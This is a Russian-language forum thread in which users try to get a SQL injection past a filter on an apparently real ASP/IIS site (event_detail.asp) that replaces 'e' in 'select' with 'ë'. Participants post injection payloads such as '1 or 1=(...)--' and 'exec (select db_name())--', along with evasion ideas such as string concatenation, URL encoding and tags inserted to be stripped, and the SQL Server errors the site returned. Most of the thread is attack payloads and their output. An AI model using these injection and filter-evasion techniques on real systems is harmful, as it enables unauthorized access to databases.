вот впервые столкнулся с такой интересной фильтрацией:

если в теле запроса видит select то переводит его в такой вид:

selëct db_name()

и соотвественно скуль ругается:

Line 1: Incorrect syntax near ';'.

т.е. вместо второе е подставляет html значение немецкой ё - ë

попытки закодировать select в %73%65%6C%65%63%74

успеха не принесли

если ли еще какие-то варианты?

там же Iis и винда, а ей пофиг на регистр

ээээ... Я правильно понял твою проблему?

;exec ("SELE"+"CT users"+"FROM tables")

я вообще не встречал, чтоб такая фича гдето работала

посоветую поискать какие слова/символы вырезаются. Именно вырезаются. Так, например, если вырезается тег <script>, то запрос нужно желать таким: se<script>lect

так ведь, дык не вырезается а заменяет на ё

Dima-k17

отвечает:


Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near 'ect'.

/event_detail.asp, line 44
обрамляем скобками и видим что не нравится:


1 or 1=(["sel"+"ect" db_name()])--

Microsoft OLE DB Provider for SQL Server error '80040e14'

Invalid column name '"sel" "ect" db_name()'.

/event_detail.asp, line 44
т.е. при таком запросе просто отбрасывает sel

если пробовать так:


4696; exec (select db_name())--

то ответ:


Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near 'ex'.

/event_detail.asp, line 44
подставляем скобки:


Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near 'ex&euml;c (sel&euml;ct db_name())'.

/event_detail.asp, line 44